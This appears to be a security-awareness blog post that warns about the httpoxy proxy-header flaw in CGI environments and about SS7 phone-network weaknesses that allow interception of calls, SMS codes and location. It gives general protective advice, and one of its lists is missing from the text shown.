if you are running your website on a VPS, then you need to be aware of the HTTPOXY vulnerability, and take immediate steps to prevent it from attacking your server.
httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. It comes down to a simple namespace conflict: RFC 3875 (CGI) puts the HTTP Proxy header from a request into the environment variables as HTTP_PROXY HTTP_PROXY is a popular environment variable used to configure an outgoing proxy This leads to a remotely exploitable vulnerability. If you’re running PHP or CGI, you should block the Proxy header now.
If a vulnerable HTTP client makes an outgoing HTTP connection, while running in a server-side CGI application, an attacker may be able to:
httpoxy is extremely easy to exploit in basic form. Luckily, if you are affected, easy mitigations are available.
A signalling system called ss7 - used by virtually all mobile phone companies worldwide to connect between networks has a vulnerability, enabling cyber criminals and government agencies to listen to phone calls, read your texts, and find your location just by knowing your phone number and there is nothing that an end user can do to protect themselves against it. The increasing use of SMS codes to authorise changes to bank accounts & payments, two-step authentication for websites, means that yet another authentication method has been compromised.
SS7 allows mobile phone networks to exchange the information needed for passing calls and text messages between each other and to ensure correct billing. SS7 also allows users on one network to roam on another network or in another country.
Cybercriminals and security agencies can transparently forward calls, giving them the ability to record or listen in to them; read SMS messages sent between phones, and track the location of a phone.
Anyone with a mobile phone could be vulnerable, providing the mobile network or its connected networks.
Since the exposure of security holes within the SS7 system, certain bodies, including the mobile phone operators’ trade association, the GSMA, have set up a series of services that monitor the networks, looking for intrusions or abuse of the signalling system.
One of the biggest dangers is the interception of two-step verification codes that are often used as a security measure when logging into websites, email accounts or banking where verification codes are sent via text message.
Banks and other secure institutions also use phone calls or text messages to verify a user’s identity, which could be intercepted and therefore led to fraud or malicious attacks.
There is very little you can do to protect yourself beyond not using the services. For text messages, avoiding SMS and instead using encrypted messaging services such as Apple’s iMessage, Facebook’s WhatsApp or the many others available will allow you to send and receive instant messages without having to go through the SMS network, protecting them from surveillance.
For calls, using a service that carries voice over data rather than through the voice call network will help prevent your calls from being snooped on. Messaging services including WhatsApp permit calls. Silent Circle’s end-to-end encrypted Phone service or the open-source Signal app also allow secure voice communications.
Your location could be being tracked at any stage when you have your mobile phone on. The only way to avoid it is to turn off your phone or turn off its connection to the mobile phone network and rely on Wi-Fi instead.
Security holes within SS7 were first uncovered by security researchers, and demonstrated at Chaos Communication Congress hacker conference in Hamburg in 2014. In 2015 the hacking of Italian surveillance software vendor Hacking Team highlighted the continuing use of the SS7 system in government and criminal snooping. German researcher Nohl demonstrated by remotely surveilling a US congressman in California from Berlin for CBS’s 60 Minutes that has brought SS7 under the spotlight once again. Congressman Ted Lieu has called for an oversight committee investigation into the vulnerability.